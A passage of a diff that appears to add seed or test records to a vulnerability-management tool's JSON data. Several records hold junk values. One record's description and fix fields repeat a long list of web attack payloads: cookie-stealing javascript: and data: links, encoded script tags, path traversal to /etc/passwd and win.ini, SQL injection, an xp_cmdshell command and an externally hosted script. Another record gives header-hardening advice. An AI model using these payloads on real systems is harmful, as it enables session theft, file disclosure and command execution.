5lAj9+LccoCzLYPZjBA3gIGRgHj4EuxewH6JdZhKBVPM4CL7rEIiKo7kMAvILIEXplvA/bCR2JXAYMSawtkiqfaDHjNtYVfhzJJBvBGJ3zmADhv6054W71ZrBNvHZDigr0DDCcFkHeB8wog70G/2LXA+xIrh03i02Zgavx0Blo+SA5Q+yEcrVSAYvjYBhwEPrEoDZ+KX20wIe7G1ZtwTJIDyMYU+FwBeuGLpaLqg91NcqnqgQU9Yre/ETpzkwXIIKAAmRnQruboUeiVS1cHmF8pcv70bqBVkgak1tgAaYbuw9bj9kFjVN28wsJvxK9VFQDGzjVF7d9+9z1ARJIHyMxRQNo2SDn2408HBsY5njZJPcFbTomJo59H5HIAUmIDpPQXVGS0igfg7detBqptv/0ulwfIbbQB8kchVtNmiQsQUO7Qru37jpQX7WmS/6YZPXP+LPprbVgC0ul0Op1Op9Pp/gYrAa7fWhG7QQAAAABJRU5ErkJggg==);background-repeat:no-repeat;display:block;width:100%;height:100px; onclick=alert(unescape(/Oh%20No!/.source));return(false);// \n> \n[text](http://danlec.com \" [@danlec](/danlec) \") \n[a](javascript:this;alert(1)) \n[a](javascript:this;alert(1)) \n[a](javascript:this;alert(1)) \n[a](Javascript:alert(1)) \n[a](Javas%26%2399;ript:alert(1)) \n[a](javascript:alert￾(1)) \n[a](javascript:confirm(1) \n[a](javascript://www.google.com%0Aprompt(1)) \n[a](javascript://%0d%0aconfirm(1);com) \n[a](javascript:window.onerror=confirm;throw%201) \n[a]([\u4e3a\u4e86\u641c\u7d22\u6210\u529f\uff0c\u8fd9\u91cc\u4e3a0x01\u4e0d\u53ef\u89c1\u5b57\u7b26\uff0c\u4e0d\u5305\u62ec\u4e2d\u62ec\u53f7]javascript:alert(document.domain)) \n<\\h1\\>confirm(2)", + "vul_desc_en": null, + "vul_desc_zh": "[a](javascript:prompt(document.cookie)) \n[a](j a v a s c r i p t:prompt(document.cookie)) \n![a](javascript:prompt(document.cookie))\\ \n \n<javascript:alert('XSS')> \n![a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)\\ \n[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K) \n[a](javascript:alert('XSS')) \n![a'\"`onerror=prompt(document.cookie)](x)\\ \n[citelol]: (javascript:prompt(document.cookie)) \n[notmalicious](javascript:window.onerror=alert;throw%20document.cookie) \n[test](javascript://%0d%0aprompt(1)) \n[test](javascript://%0d%0aprompt(1);com) \n[notmalicious](javascript:window.onerror=alert;throw%20document.cookie) \n[notmalicious](javascript://%0d%0awindow.onerror=alert;throw%20document.cookie) \n[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K) \n[clickme](vbscript:alert(document.domain)) \n_http://danlec_@.1 style=background-image:url(data:image/png;base64,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);background-repeat:no-repeat;display:block;width:100%;height:100px; onclick=alert(unescape(/Oh%20No!/.source));return(false);// \n> \n[text](http://danlec.com \" [@danlec](/danlec) \") \n[a](javascript:this;alert(1)) \n[a](javascript:this;alert(1)) \n[a](javascript:this;alert(1)) \n[a](Javascript:alert(1)) \n[a](Javas%26%2399;ript:alert(1)) \n[a](javascript:alert￾(1)) \n[a](javascript:confirm(1) \n[a](javascript://www.google.com%0Aprompt(1)) \n[a](javascript://%0d%0aconfirm(1);com) \n[a](javascript:window.onerror=confirm;throw%201) \n[a]([\u4e3a\u4e86\u641c\u7d22\u6210\u529f\uff0c\u8fd9\u91cc\u4e3a0x01\u4e0d\u53ef\u89c1\u5b57\u7b26\uff0c\u4e0d\u5305\u62ec\u4e2d\u62ec\u53f7]javascript:alert(document.domain)) \n<\\h1\\>confirm(2)", + "vul_fix": "[a](javascript:prompt(document.cookie)) \n[a](j a v a s c r i p t:prompt(document.cookie)) \n![a](javascript:prompt(document.cookie))\\ \n \n<javascript:alert('XSS')> \n![a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)\\ \n[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K) \n[a](javascript:alert('XSS')) \n![a'\"`onerror=prompt(document.cookie)](x)\\ \n[citelol]: (javascript:prompt(document.cookie)) \n[notmalicious](javascript:window.onerror=alert;throw%20document.cookie) \n[test](javascript://%0d%0aprompt(1)) \n[test](javascript://%0d%0aprompt(1);com) \n[notmalicious](javascript:window.onerror=alert;throw%20document.cookie) \n[notmalicious](javascript://%0d%0awindow.onerror=alert;throw%20document.cookie) \n[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K) \n[clickme](vbscript:alert(document.domain)) \n_http://danlec_@.1 style=background-image:url(data:image/png;base64,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);background-repeat:no-repeat;display:block;width:100%;height:100px; onclick=alert(unescape(/Oh%20No!/.source));return(false);// \n> \n[text](http://danlec.com \" [@danlec](/danlec) \") \n[a](javascript:this;alert(1)) \n[a](javascript:this;alert(1)) \n[a](javascript:this;alert(1)) \n[a](Javascript:alert(1)) \n[a](Javas%26%2399;ript:alert(1)) \n[a](javascript:alert￾(1)) \n[a](javascript:confirm(1) \n[a](javascript://www.google.com%0Aprompt(1)) \n[a](javascript://%0d%0aconfirm(1);com) \n[a](javascript:window.onerror=confirm;throw%201) \n[a]([\u4e3a\u4e86\u641c\u7d22\u6210\u529f\uff0c\u8fd9\u91cc\u4e3a0x01\u4e0d\u53ef\u89c1\u5b57\u7b26\uff0c\u4e0d\u5305\u62ec\u4e2d\u62ec\u53f7]javascript:alert(document.domain)) \n<\\h1\\>confirm(2)\n'> \n='> \n \n \n%3Cscript%3Ealert('XSS')%3C/script%3E \n \n \n%0a%0a.jsp \n%22%3cscript%3ealert(%22xss%22)%3c/script%3e \n%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd \n%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini \n%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e \n%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e \n%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html \n%3f.jsp \n%3f.jsp \n \n \n?sql_debug=1 \na%5c.aspx \na.jsp/ \na/ \na? \n\"> \n';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\\inetpub\\wwwroot\\?.txt'--&& \n%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \n%3Cscript%3Ealert(document. domain);%3C/script%3E& \n%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID= \n1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname= \nhttp://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/etc/passwd \n..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini \n\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini \n'';!--\"=&{()} \n \n \n \n \n \n \n \n \n \n \n\"\";' > out \n \n \n \n \n \n \n \n
\n \n \n \n \n \n \n \n \n \n
\n
\n
\n \n \n \n \n \n \ngetURL(\"javascript:alert('XSS')\") \na=\"get\";b=\"URL\";c=\"javascript:\";d=\"alert('XSS');\";eval(a+b+c+d); \n \n\"> <\" \n \n \n \n \n \n \n \nPT src=\"http://xss.ha.ckers.org/a.js\"> \nlink\n\n\";alert(1);//xx \n \n \n\u00bcscript\u00bealert(\u00a2XSS\u00a2)\u00bc/script\u00be //US-ASCII\u7f16\u7801\uff0c\u5982Tomcat \n \n \n \n \n \n \n \n \naaaa \naaaa \nXSS \nXSS \n \n \n //\u65e0\u9700js\u6807\u7b7e\uff0c\u53ef\u76f4\u63a5\u6267\u884c \n //IE7\u4ee5\u4e0b \n \n \n
//IE7\u4ee5\u4e0b \n
\n \n \n //Firefox/Chrome \n \n \n \n //Firefox/Chrome/Safari \n \n \n \n'\"> //IE \n //IE \n \n \n \nal \n// \u4e0b\u9762\u7684img\u6807\u7b7e\u90fd\u662f\u5728IE7\u4ee5\u4e0b\u7248\u672c\u751f\u6548 \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n //IE7\u4ee5\u4e0b \n \n \n //IE7\u4ee5\u4e0b \n \n \n //Firefox \n \n \n \n \nalalertert(1) \n \n \n \n \n \n \n[quote]\">'> \n<[/quote] \n \n \n
  • XSS
    //IE7\u4ee5\u4e0b \n //IE7\u4ee5\u4e0b \n //IE7\u4ee5\u4e0b \n //IE7\u4ee5\u4e0b \n \n \n \n \n \n
//IE7\u4ee5\u4e0b \n
//IE7\u4ee5\u4e0b \n
//IE7\u4ee5\u4e0b", + "vul_fix_en": null, + "vul_fix_zh": "[a](javascript:prompt(document.cookie)) \n[a](j a v a s c r i p t:prompt(document.cookie)) \n![a](javascript:prompt(document.cookie))\\ \n \n<javascript:alert('XSS')> \n![a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)\\ \n[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K) \n[a](javascript:alert('XSS')) \n![a'\"`onerror=prompt(document.cookie)](x)\\ \n[citelol]: (javascript:prompt(document.cookie)) \n[notmalicious](javascript:window.onerror=alert;throw%20document.cookie) \n[test](javascript://%0d%0aprompt(1)) \n[test](javascript://%0d%0aprompt(1);com) \n[notmalicious](javascript:window.onerror=alert;throw%20document.cookie) \n[notmalicious](javascript://%0d%0awindow.onerror=alert;throw%20document.cookie) \n[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K) \n[clickme](vbscript:alert(document.domain)) \n_http://danlec_@.1 style=background-image:url(data:image/png;base64,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);background-repeat:no-repeat;display:block;width:100%;height:100px; onclick=alert(unescape(/Oh%20No!/.source));return(false);// \n> \n[text](http://danlec.com \" [@danlec](/danlec) \") \n[a](javascript:this;alert(1)) \n[a](javascript:this;alert(1)) \n[a](javascript:this;alert(1)) \n[a](Javascript:alert(1)) \n[a](Javas%26%2399;ript:alert(1)) \n[a](javascript:alert￾(1)) \n[a](javascript:confirm(1) \n[a](javascript://www.google.com%0Aprompt(1)) \n[a](javascript://%0d%0aconfirm(1);com) \n[a](javascript:window.onerror=confirm;throw%201) \n[a]([\u4e3a\u4e86\u641c\u7d22\u6210\u529f\uff0c\u8fd9\u91cc\u4e3a0x01\u4e0d\u53ef\u89c1\u5b57\u7b26\uff0c\u4e0d\u5305\u62ec\u4e2d\u62ec\u53f7]javascript:alert(document.domain)) \n<\\h1\\>confirm(2)\n'> \n='> \n \n \n%3Cscript%3Ealert('XSS')%3C/script%3E \n \n \n%0a%0a.jsp \n%22%3cscript%3ealert(%22xss%22)%3c/script%3e \n%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd \n%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini \n%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e \n%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e \n%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html \n%3f.jsp \n%3f.jsp \n \n \n?sql_debug=1 \na%5c.aspx \na.jsp/ \na/ \na? \n\"> \n';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\\inetpub\\wwwroot\\?.txt'--&& \n%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \n%3Cscript%3Ealert(document. domain);%3C/script%3E& \n%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID= \n1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname= \nhttp://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/etc/passwd \n..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini \n\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini \n'';!--\"=&{()} \n \n \n \n \n \n \n \n \n \n \n\"\";' > out \n \n \n \n \n \n \n \n
\n \n \n \n \n \n \n \n \n \n
\n
\n
\n \n \n \n \n \n \ngetURL(\"javascript:alert('XSS')\") \na=\"get\";b=\"URL\";c=\"javascript:\";d=\"alert('XSS');\";eval(a+b+c+d); \n \n\"> <\" \n \n \n \n \n \n \n \nPT src=\"http://xss.ha.ckers.org/a.js\"> \nlink\n\n\";alert(1);//xx \n \n \n\u00bcscript\u00bealert(\u00a2XSS\u00a2)\u00bc/script\u00be //US-ASCII\u7f16\u7801\uff0c\u5982Tomcat \n \n \n \n \n \n \n \n \naaaa \naaaa \nXSS \nXSS \n \n \n //\u65e0\u9700js\u6807\u7b7e\uff0c\u53ef\u76f4\u63a5\u6267\u884c \n //IE7\u4ee5\u4e0b \n \n \n
//IE7\u4ee5\u4e0b \n
\n \n \n //Firefox/Chrome \n \n \n \n //Firefox/Chrome/Safari \n \n \n \n'\"> //IE \n //IE \n \n \n \nal \n// \u4e0b\u9762\u7684img\u6807\u7b7e\u90fd\u662f\u5728IE7\u4ee5\u4e0b\u7248\u672c\u751f\u6548 \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n //IE7\u4ee5\u4e0b \n \n \n //IE7\u4ee5\u4e0b \n \n \n //Firefox \n \n \n \n \nalalertert(1) \n \n \n \n \n \n \n[quote]\">'> \n<[/quote] \n \n \n
  • XSS
    //IE7\u4ee5\u4e0b \n //IE7\u4ee5\u4e0b \n //IE7\u4ee5\u4e0b \n //IE7\u4ee5\u4e0b \n \n \n \n \n \n
//IE7\u4ee5\u4e0b \n
//IE7\u4ee5\u4e0b \n
//IE7\u4ee5\u4e0b", + "vul_name": "1", + "vul_name_en": null, + "vul_name_zh": "1", + "vul_type": "1" + }, + { + "level": 1, + "state": "enable", + "system_type": 0, + "user": 1, + "vul_desc": "1", + "vul_desc_en": null, + "vul_desc_zh": "1", + "vul_fix": "", + "vul_fix_en": null, + "vul_fix_zh": "", + "vul_name": "123", + "vul_name_en": null, + "vul_name_zh": "123", + "vul_type": "123" + }, + { + "level": 1, + "state": "disable", + "system_type": 0, + "user": 1, + "vul_desc": "\n1\u3001\u4fee\u6539\u670d\u52a1\u7aef\u7a0b\u5e8f\uff0c\u7ed9HTTP\u54cd\u5e94\u5934\u52a0\u4e0aStrict-Transport-Security \u5982\u679c\u662fjava \u670d\u52a1\u7aef\uff0c\u53ef\u4ee5\u4f7f\u7528\u5982\u4e0b\u65b9\u5f0f\u6dfb\u52a0HTTP\u54cd\u5e94\u5934\n\nresponse.setHeader(\"Strict-Transport-Security\"\uff0c\"value\")\n\u5982\u679c\u662fphp \u670d\u52a1\u7aef\uff0c\u53ef\u4ee5\u4f7f\u7528\u5982\u4e0b\u65b9\u5f0f\u6dfb\u52a0HTTP\u54cd\u5e94\u5934\n\nheader('Strict-Transport-Security:value')\n\u5982\u679c\u662fasp\u670d\u52a1\u7aef\uff0c\u53ef\u4ee5\u4f7f\u7528\u5982\u4e0b\u65b9\u5f0f\u6dfb\u52a0 HTTP\u54cd\u5e94\u5934\n\nResponse.AddHeader \"Strict-Transport-Security\",\"value\"\n\u5982\u679c\u662fpython django \u670d\u52a1\u7aef\uff0c\u53ef\u4ee5\u4f7f\u7528\u5982\u4e0b\u65b9\u5f0f\u6dfb\u52a0HTTP\u54cd\u5e94\u5934\n\nresponse=HttpResponse() \nresponse['Strict-Transport-Security']=\"value\u201d\n\u5982\u679c\u662fpython flask\u670d\u52a1\u7aef\uff0c\u53ef\u4ee5\u4f7f\u7528\u5982\u4e0b\u65b9\u5f0f\u6dfb\u52a0 HTTP\u54cd\u5e94\u5934\n\nresponse=make_ response()\nresponse.headers[\"Strict-Transport-Security\"]=\"value\";\n2\u3001\u4fee\u6539\u8d1f\u8f7d\u5747\u8861\u6216\u53cd\u5411\u4ee3\u7406\u670d\u52a1\u5668\uff0c\u7ed9HTTP\u54cd\u5e94\u5934\u52a0\u4e0aStrict-Transport-Security;\n\n\u5982\u679c\u4f7f\u7528Nginx\u3001Tengine\u3001Open resty \u7b49\u4f5c\u4e3a\u4ee3\u7406\u670d\u52a1\u5668\uff0c\u5728\u914d\u7f6e\u6587\u4ef6\u4e2d\u5199\u5165\u5982\u4e0b\u5185\u5bb9\u5373\u53ef\u6dfb\u52a0HTTP\u54cd\u5e94\u5934\uff1b\n\nadd_header Strict-Transport-Security value\uff1b\n\u5982\u679c\u4f7f\u7528Apache\u4f5c\u4e3a\u4ee3\u7406\u670d\u52a1\u5668\uff0c\u5728\u914d\u7f6e\u6587\u4ef6\u4e2d\u5199\u5165\u5982\u4e0b\u5185\u5bb9\u5373\u53ef\u6dfb\u52a0HTTP\u554a\u5e94\u5934\uff1a\n\nHeader add Strict-Transport-Security\"value\"\u3002", + "vul_desc_en": null, + "vul_desc_zh": "\n1\u3001\u4fee\u6539\u670d\u52a1\u7aef\u7a0b\u5e8f\uff0c\u7ed9HTTP\u54cd\u5e94\u5934\u52a0\u4e0aStrict-Transport-Security \u5982\u679c\u662fjava \u670d\u52a1\u7aef\uff0c\u53ef\u4ee5\u4f7f\u7528\u5982\u4e0b\u65b9\u5f0f\u6dfb\u52a0HTTP\u54cd\u5e94\u5934\n\nresponse.setHeader(\"Strict-Transport-Security\"\uff0c\"value\")\n\u5982\u679c\u662fphp 